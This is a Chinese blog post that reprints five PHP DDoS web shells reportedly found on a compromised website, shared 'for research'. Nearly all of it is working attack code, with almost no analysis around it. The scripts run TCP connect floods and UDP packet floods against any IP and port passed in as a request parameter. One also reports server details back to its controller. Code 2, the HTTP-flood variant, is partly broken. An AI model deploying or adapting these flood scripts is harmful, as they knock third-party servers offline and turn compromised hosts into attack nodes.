php的shell_dDos攻击型web shell

知己知彼,方能運籌帷幄, 有个朋友的网站中招了,经过检测发现了几种攻击代码,现贴出来,供大家研究.
代码1:

<?php
ini_set("display_errors", "Off");
$packets = 0;
$ip = $_GET['ip'];
$port = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "状态 : 正常运行中.....<br>";
$max_time = $time+$exec_time;
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0);
}
echo "================================================<br>";
echo "  <font color=blue>www.baidu.com<br>";
echo "  SYN Flood 模块<br>";
echo "  作者：ybhacker<br>";
echo "  警告：本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>";
echo "================================================<br><br>";
echo "  攻击包总数：<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>";
echo "  攻击总流量：<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>";
echo "  攻击总字节：<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>";
echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>

代码2:

<?php
//cc模式：
error_reporting(E_ALL);
set_time_limit(0);
ob_implicit_flush();
$address = $_POST['site'];
$port = $_POST['port'];
$dongu = $_POST['dongu'];   //循环次数
$sayi = 1;
while ( $sayi <= $dongu ){
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) === false) {
echo "HaHa\n";
}

if (socket_bind($sock, $address, $port) === false) {
echo "HaHa\n";
}

if (socket_listen($sock, 5) === false) {
echo "HaHa\n";
}
$msg = "HTTP/1.1 GET /\r\nHost:"+$_GET['site']+"\r\nConnection: Keep-Alive\r\n";
socket_write($msg);
socket_close($sock);                //这几句是核心功能
$sayi++;
echo "Goodbye...".$sayi;
}
?>

代码3

<?php
//syn模式
ini_set("display_errors", "Off");
$packets = 0;
$ip = $_GET['ip'];
$port = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "状态 : 正常运行中.....<br>";
$max_time = $time+$exec_time;
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0);     //这几句是核心功能

}
?>

代码4:

<?php
//udp模式
$packets = 0;
$ip = $_GET['ip'];
$port = $_GET['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET['time'];
$time = time();
print "状态 : 正常运行中.....<br>";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= "phpddos";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}

$fp = fsockopen("udp://$ip", $port, $errno, $errstr, 5);   //这几句是核心功能
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
?>

代码5

<?php
set_time_limit(86400);
ignore_user_abort(True);
$packets = 0;
$http = $_GET['http'];
$rand = $_GET['exit'];
$exec_time = $_GET['time'];
if (StrLen($http)==0 or StrLen($rand)==0 or StrLen($exec_time)==0)
{
if(StrLen($_GET['rat'])<>0)
{
echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];
exit;
}
echo "Php 2012 Terminator";
exit;
}
for($i=0;$i<65535;$i++)
{
$out .= "X";
}
//Udp1-fsockopen Udp2 pfsockopen Tcp3 CC.center
$max_time = time()+$exec_time;
if($rand==53)
while(1)
{
$packets++;
if(time() > $max_time)
{
break;
}
$fp = fsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
if($rand==500)
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("udp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
else
while(1)
{
$packets++;
if(time() > $max_time){
break;
}
$fp = pfsockopen("tcp://$http", $rand, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
?>

本文出自 “墨亦白时白亦墨” 博客，请务必保留此出处http://mobai.blog.51cto.com/7300044/1214407